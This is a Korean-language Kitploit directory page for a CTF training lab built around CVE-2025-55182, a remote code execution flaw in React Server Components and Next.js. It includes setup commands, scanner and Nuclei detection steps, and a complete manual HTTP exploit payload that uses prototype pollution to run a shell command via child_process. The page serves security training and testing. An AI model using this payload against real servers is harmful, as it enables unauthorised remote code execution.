Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-React2Shell-Lab — CVE-2025-55182 (React 서버 컴포넌트의 RCE 취약점)을 악용하는 취약한 Next.js 블로그, 탐지 스크립트, 수동 익스플로잇 페이로드를 포함한 실습형 보안 교육용 CTF 실습 환경 | Kitploit
도구/GitHubGitHub/goultarde/cve-2025-55182-react2shell-lab
Vulnerability AnalysisExploitationWeb Application ExploitationCTFLearning & EducationLabs & Practice
GitHubgoultarde/cve-2025-55182-react2shell-lab

CVE-2025-55182-React2Shell-Lab

CVE-2025-55182 (React 서버 컴포넌트의 RCE 취약점)을 악용하는 취약한 Next.js 블로그, 탐지 스크립트, 수동 익스플로잇 페이로드를 포함한 실습형 보안 교육용 CTF 실습 환경

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
저장소 보기
48개월 전아직 검토되지 않음
공유

CyberSec Blog CTF - React2Shell PoC

이 저장소는 Next.js와 React Server Components를 사용하는 사이버보안 블로그 기반의 취약한 CTF(Capture The Flag) 환경을 제공합니다.

CVE-2025-55182 : React Server Components 버전 19.0.0, 19.1.0, 19.1.1, 19.2.0에서 인증 전 원격 코드 실행(RCE) 취약점. 취약한 코드는 Server Function 엔드포인트로 향하는 HTTP 요청 페이로드를 안전하지 않게 역직렬화합니다.

CVE-2025-66478 : App Router를 사용하는 Next.js 애플리케이션에 영향.


CTF 설명

이 챌린지는 다음과 같은 사이버보안 블로그를 제공합니다:

  • 보안 주제(Web, React, CTF, Next.js, 역직렬화)에 관한 5개의 게시물
  • 3명의 가상 저자
  • 현대적인 다크 모드 인터페이스

블로그는 취약한 버전의 React와 Next.js를 사용하여 React2Shell 취약점을 악용할 수 있습니다.

사용된 취약 버전

PackageVersion
next16.0.6
react19.2.0
react-dom19.2.0

CTF 실행 방법

Docker 사용 (권장)

root@kitploit:~
# Construire l'image
docker build -t react2shell-poc .

# Lancer le conteneur
docker run --rm -p 127.0.0.1:3000:3000 react2shell-poc

Docker 없이

root@kitploit:~
npm install
npm run build
npm run start

그런 다음 http://127.0.0.1:3000에 접속하세요.

취약점 탐지 방법

AssetNote 스캐너 사용

root@kitploit:~
git clone https://github.com/assetnote/react2shell-scanner && cd react2shell-scanner
virtualenv venv && source venv/bin/activate && pip install -r requirements.txt

python3 scanner.py -u http://127.0.0.1:3000

Nuclei 사용

root@kitploit:~
nuclei -t ./nuclei-template/CVE-2025-55182.yaml -u http://127.0.0.1:3000

공격 방법

React2Shell 도구 사용

Python 익스플로잇은 React2Shell/ 폴더를 참조하세요.

수동 HTTP 페이로드

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

응답에는 x-action-redirect 헤더에 id 명령의 결과가 포함됩니다.

참조

  • 보안 권고: React Server Components 및 Next.js의 치명적인 RCE 취약점
  • CVE-2025-55182 - NVD
  • CVE-2025-66478 - Next.js Security Advisory
  • React2Shell Scanner - AssetNote

simple-nextjs-blog 템플릿과 CVE-2025-55182 취약 환경을 기반으로 한 맞춤형 CTF 챌린지.

도구 다운로드